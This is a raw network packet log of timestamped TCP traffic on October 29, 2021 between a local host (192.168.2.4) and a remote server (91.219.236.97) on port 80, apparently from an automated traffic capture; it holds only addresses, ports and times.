Oct 29, 2021 20:51:16.302498102 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302504063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302522898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302525043 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302553892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302578926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302602053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302613020 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302622080 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302627087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302653074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302680016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302695036 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302702904 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302705050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302726984 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302751064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302773952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302798033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302803040 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302810907 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302822113 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302845955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302870989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302894115 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302894115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302901030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302918911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302941084 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.302943945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302968025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.302994013 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303016901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303035021 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.303040981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303040981 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.303065062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303082943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303101063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303117990 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303134918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303157091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303179979 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.303181887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303200960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303214073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303226948 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.303227901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303246975 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303260088 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.303272963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303286076 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.303297997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303319931 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303343058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303347111 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.303366899 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303374052 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.303391933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.303419113 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339066029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339104891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339127064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339149952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339171886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339195013 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339217901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339241028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339250088 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339262962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339286089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339308023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339330912 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339354992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339363098 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339366913 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339379072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339401960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339425087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339448929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339469910 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339471102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339473009 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339493990 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339517117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339540005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339541912 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339545965 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339564085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339587927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339610100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339632988 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339636087 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339639902 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339658022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339680910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339704037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339724064 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339726925 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339726925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339751005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339775085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339797974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339819908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339821100 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339826107 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339844942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339868069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339893103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339915991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339927912 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339932919 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.339939117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339962006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.339986086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.340003967 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.340008974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.340009928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.340034962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.340055943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.340079069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.340123892 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.340128899 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.617374897 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.840133905 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:16.866786957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:16.866967916 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:17.915035963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:17.915180922 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.538724899 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.571233034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571261883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571276903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571295023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571369886 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.571414948 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.571630955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571651936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571667910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571686029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571698904 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.571719885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571727991 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.571738958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.571774960 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.619589090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619616032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619632959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619649887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619666100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619678020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619694948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619693041 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.619710922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619729042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619745016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.619749069 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.619781017 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.619986057 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620006084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620023012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620039940 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620053053 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.620055914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620074034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620090008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620093107 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.620105982 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620124102 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.620135069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620146990 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.620151043 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.620196104 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653129101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653156996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653172970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653191090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653208017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653223991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653240919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653255939 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653263092 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653280020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653296947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653301001 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653314114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653322935 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653331041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653358936 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653381109 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653398037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653414965 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653430939 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653446913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653462887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653465986 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653480053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653486967 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653525114 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653528929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653568029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653605938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653652906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653670073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653687954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653704882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653709888 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653723955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653740883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653748035 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653758049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653774977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653780937 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653791904 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653809071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653817892 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653825045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653841972 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653851032 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653857946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653876066 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653882980 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653891087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653908014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653915882 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653924942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653942108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653949022 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.653959036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653975964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.653981924 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.654015064 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698123932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698152065 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698169947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698189020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698213100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698231936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698245049 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698275089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698291063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698296070 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698340893 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698354959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698407888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698451042 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698467970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698484898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698518991 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698591948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698626041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698642969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698661089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698678017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698688030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698697090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698697090 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698715925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698735952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698751926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698751926 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698769093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698776960 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698786974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698802948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.698810101 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.698848963 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699008942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699028015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699043989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699060917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699063063 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699103117 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699245930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699263096 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699280024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699305058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699309111 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699341059 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699342012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699357986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699390888 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699423075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699440002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699457884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699476004 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699507952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699525118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699541092 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699543953 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699584961 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699596882 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699601889 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699620962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699637890 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699640989 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699655056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699671984 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699678898 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699690104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699707031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699714899 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699723959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699740887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699744940 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699758053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699776888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699780941 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699793100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699810982 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699822903 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699829102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699846029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699847937 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699863911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699879885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699884892 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.699898005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.699917078 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735203981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735230923 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735244036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735260963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735277891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735296011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735311985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735312939 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735330105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735346079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735354900 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735363007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735374928 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735382080 CEST	80	49865	91.219.236.97	192.168.2.4
